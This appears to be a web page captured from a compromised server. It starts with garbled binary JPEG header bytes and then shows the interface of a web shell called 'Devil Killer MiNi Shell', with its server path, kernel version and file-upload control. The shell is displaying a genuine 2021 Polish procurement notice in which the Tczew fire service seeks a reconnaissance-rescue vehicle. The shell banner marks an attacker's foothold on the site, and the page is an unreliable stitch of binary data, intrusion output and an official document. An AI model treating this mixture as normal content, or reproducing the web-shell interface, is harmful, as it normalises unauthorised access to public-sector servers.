JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210728/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210728/0012976201-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00129762 z dnia 2021-07-28</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa 1 szt. samochodu rozpoznawczo - ratowniczego SLRR do Komendy Powiatowej PSP w Tczewie. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">KOMENDA POWIATOWA PAŃSTWOWEJ STRAŻY POŻARNEJ W TCZEWIE</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">KP PSP W TCZEWIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191123898</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">LECHA 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tczew</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">83-110</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL638 - Starogardzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">58 530 40 64</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">58 530 40 90</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat.tczew@straz.gda.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.gov.pl/web/kppsp-tczew</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> OCHRONA PRZECIWPOŻAROWA </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa 1 szt. samochodu rozpoznawczo - ratowniczego SLRR do Komendy Powiatowej PSP w Tczewie. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4b88351b-ef7d-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00129762</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>postępowaniu o<br/>udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu<br/>miniPortalu<br/>https://miniportal.uzp.gov.pl/, ePUAPu https://epuap.gov.pl/wps/portal oraz poczty elektronicznej.<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto<br/>na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany,<br/>wycofania oferty lub<br/>wniosku oraz do formularza do komunikacji.<br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii<br/>dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w<br/>Regulaminie korzystania z<br/>miniPortalu oraz Regulaminie ePUAP.<br/>4. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia,<br/>zmiany,<br/>wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB.<br/>5. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych<br/>kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>6. Zamawiający przekazuje link do postępowania oraz ID postępowania jako załącznik do niniejszej<br/>SWZ. Dane<br/>postępowanie można wyszukać również na Liście wszystkich postępowań klikając wcześniej opcję „Dla<br/>Wykonawców”<br/>lub ze strony głównej z zakładki Postępowania na miniPortalu.<br/>7. Adres strony internetowej na której zamieszczone będzie ogłoszenie, SWZ, treść pytań i wyjaśnienia<br/>do SWZ oraz<br/>inne informacje przewidziane ustawą Pzp to:<br/>https://miniportal.uzp.gov.pl/<br/>8. Do porozumiewania się z Wykonawcami upoważnione są następujące osoby:<br/>a) sekc. Krzysztof Mechliński, tel. 58 530 40 77, email: sekretariat.tczew@straz.gda.pl<br/>b) Angelika Cieślińska, tel. 58 530 40 68, email: sekretariat.tczew@straz.gda.pl<br/>9. Komunikacja między Zamawiającym a Wykonawcą w zakresie składania dokumentów<br/>elektronicznych (innych niż<br/>oferta), oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń, zawiadomień, wezwań oraz<br/>przekazywania<br/>informacji, zadawania pytań do treści SWZ, może odbywać się za pomocą poczty elektronicznej, na<br/>adres e-mail<br/>Zamawiającego (sekretariat.tczew@straz.gda.pl) i adres e-mail: wskazany w ofercie Wykonawcy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzeniem Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (Dz.U.UE.L.2016.119.1), zwanego dalej „RODO”, informujemy, że:<br/>1. Administratorem przetwarzającym Pani(a) dane osobowe jest Komendant Powiatowy Państwowej<br/>Straży Pożarnej, z siedzibą w Tczewie (83-110), przy ul. Lecha 11 (adres poczty elektronicznej:<br/>sekreteriat.tczew@straz.gda.pl).<br/>2. W Komendzie Powiatowej Państwowej Straży Pożarnej wyznaczony został Specjalista Ochrony<br/>Danych, adres: 83-110 Tczew, ul Lecha 11, adres poczty elektronicznej:<br/>zbigniew.rzepka@straz.gda.pl.<br/>3. Pani/Pana dane osobowe będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego.<br/>4. Odbiorcami danych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 18 oraz art. 74 ust. 2 ustawy z dnia 11 września 2019 r. prawo<br/>zamówień publicznych (Dz.U. z 2019 r. poz. 2019 ze zm.), dalej „ustawa PZP” oraz podmioty<br/>przetwarzające na rzecz administratora.<br/>5. Pani/Pana dane osobowe będą przechowywane będą przechowywane przez okres 4 lat od daty<br/>zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania Umowy<br/>przekracza 4 lat, okres przechowywania obejmuje cały czas trwania Umowy.<br/>6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy PZP.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">7. Posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>(skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz<br/>nie może naruszać integralności protokołu oraz jego załączników.)<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>(prawo do ograniczenia przetwarzania nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończenia tego postepowania oraz nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego.) 8. Przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego, którym jest Prezes Urzędu<br/>Ochrony Danych Osobowych (00-193 Warszawa, ul. Stawki 2, tel. 22 531-03-00, fax. 22 531-03-01, email:<br/>kancelaria@uodo.gov.pl) jeżeli uzna Pani/Pan, że przetwarzanie narusza przepisy RODO.<br/>9. Pani/Pana dane osobowe nie będą przekazywane do państwa trzeciego lub organizacji<br/>międzynarodowej.<br/>10. Przetwarzanie podanych przez Panią/Pana danych osobowych nie będzie podlegało<br/>zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu, o którym mowa w art. 22 ust. 1 i 4<br/>Rozporządzenia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PT.2370.2.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest: Dostawa 1 szt. samochodu rozpoznawczo-ratowniczego SLRR<br/>do Komendy Powiatowej PSP w Tczewie.<br/>2. Szczegółowy opis przedmiotu zamówienia zawarty jest w załącznikach do SWZ, tj. w<br/>załączniku nr 1 pn. "Opis przedmiotu zamówienia", zawierającym minimalne wymagania<br/>techniczno użytkowe dla przedmiotu zamówienia oraz załączniku nr 2 pn. "Projekt umowy",<br/>określającym szczegółowe warunki realizacji przedmiotu umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34144200-0 - Pojazdy służb ratowniczych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34144210-3 - Wozy strażackie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Kryteriami oceny jest:<br/>a) Cena oferty brutto 60%;<br/>b) Rodzaj powłoki lakierniczej 20%;<br/>c) Okres gwarancji 20%.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Rodzaj powłoki lakieniczej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) odpisu z<br/>właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne<br/>przepisy<br/>wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na<br/>podstawie art. 109 ust.<br/>1 pkt. 4 ustawy Pzp, (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert)-<br/>w przypadku<br/>oferty wspólnej, odpis składa każdy z wykonawców.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia wraz z ofertą przedmiotowych środków dowodowych.<br/>3. W przypadku wspólnego ubiegania się przez Wykonawców o udzielenie zamówienia<br/>dokumenty i oświadczenia wskazane w rozdziale VII tabeli 1 pkt. 1 – 4 składa również<br/>Wykonawca wspólnie ubiegający się o udzielnie zamówienia. Postanowienia rozdziału VII ust.<br/>1.3 – 1.5 stosuje się odpowiednio.<br/>5. SKŁADANIE OFERTY<br/>5.1. Do przygotowania oferty zaleca się wykorzystanie formularza ofertowego, którego wzór<br/>stanowi załącznik nr 3 do SWZ pn. „Formularz ofertowy”. W przypadku, gdy wykonawca nie korzysta z przygotowanego przez Zamawiającego wzoru, w treści oferty należy zamieścić<br/>wszystkie informacje wymagane w formularzu ofertowym.<br/>5.2. Do oferty należy dołączyć:<br/>1) Oświadczenie (wykonawcy / wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia / podmiotu/-ów udostępniającego/-ych zasoby) o niepodleganiu wykluczeniu i<br/>spełnianiu warunków udziału w postępowaniu, które stanowi załącznik nr 5 do SWZ,<br/>2) ewentualnie pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa<br/>pełnomocnik,<br/>3) ewentualnie pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>4) zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych<br/>zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy<br/>potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów – w przypadku, gdy wykonawca polega na zdolnościach lub sytuacji<br/>podmiotów udostępniających zasoby – załącznik nr 6 do SWZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1) Karty katalogowe/techniczne/foldery (bądź inne dokumenty) opisujące parametry i cechy<br/>oferowanego<br/>produktu, potwierdzające wymagania Zamawiającego.<br/>2) Kopia świadectwa homologacji typu podwozia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców działających w formie spółki cywilnej oświadczenia składane są<br/>przez każdego wspólnika spółki cywilnej oddzielnie we własnym imieniu (osoby prowadzącej<br/>działalność gospodarczą pod nazwą określoną w centralnej ewidencji i informacji o działalności<br/>gospodarczej - „Firma przedsiębiorcy”).<br/>W przypadku wspólnego ubiegania się o udzielenie zamówienia przez kilku wykonawców -<br/>podpisane przez wszystkie podmioty wspólnie ubiegające się udzielenie zamówienia,<br/>pełnomocnictwo złożone w formie oryginału lub notarialnie potwierdzonej kopii.<br/>W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie o braku<br/>podstaw do wykluczenia składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza zmianę umowy w zakresie wskazanym w art. 455 ust. 1 ustawy Pzp<br/>oraz w zakresie:<br/>1) Terminu realizacji przedmiotu zamówienia, w sytuacji gdy:<br/>• zaistnieją okoliczności mające wpływ na prawidłową realizację umowy, w szczególności jeżeli<br/>zmiana terminu realizacji nie będzie zmianą niekorzystną dla ZAMAWIAJĄCEGO,<br/>• zagrożone byłoby terminowe realizowanie zadania i płatności z powodu ograniczonych zasileń<br/>budżetowych i decyzji otrzymywanych od dysponenta nadrzędnego,<br/>• w przypadku wpłynięcia odwołania i wstrzymania procedury,<br/>• zaistnienia siły wyższej,<br/>• sytuacji związanej z stanem epidemii albo zagrożenia epidemiologicznego np. w związku z<br/>COVID-19,<br/>• w sytuacji zbyt późnego otrzymania decyzji o przydzieleniu środków finansowych,<br/>• w sytuacji pojawienia się innych nieprzewidzianych i niezawinionych przez strony okoliczności<br/>uniemożliwiających terminową realizację umowy, itp.<br/>2) Parametrów technicznych elementów wyposażenia przedmiotu zamówienia - w przypadku,<br/>gdy z przyczyn technicznych (w szczególności zakończenia produkcji lub niedostępności na<br/>rynku urządzenia zaoferowanego w ofercie) konieczne jest dokonanie zmiany np.<br/>rodzaju/modelu/typu, a parametry te będą nie gorsze niż parametry zaproponowanego w ofercie<br/>urządzenia.<br/>3) Miejsca dostawy i odbioru, w przypadku, gdyby było zagrożone zachowanie ciągłości innych<br/>dostaw sprzętowych lub w przypadku pojawienia się nagłych sytuacji kryzysowych na terenie<br/>siedziby jednostki.<br/>4) Dostosowania postanowień niniejszej umowy lub przedmiotu umowy i jego wyposażenia do<br/>nowych przepisów prawa – w przypadku zmiany przepisów prawa.<br/>5) Wartości przedmiotu umowy brutto, o której mowa w § 2 ust 1 umowy, w przypadku<br/>ustawowej zmiany stawki podatku VAT, przy założeniu, że cena netto pozostaje bez zmian.<br/>4. W przypadku wystąpienia okoliczności, o których mowa w pkt od 1) do 4) zmiany będą<br/>dopuszczalne, przy założeniu, że nie ulegnie zmianie cena ofertowa. Każda ewentualna zmiana<br/>wymagać będzie odrębnego rozpatrzenia i zasadności jej wprowadzenia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-06 15:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-09 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Wszelkie koszty związane z przygotowaniem oraz dostarczeniem oferty 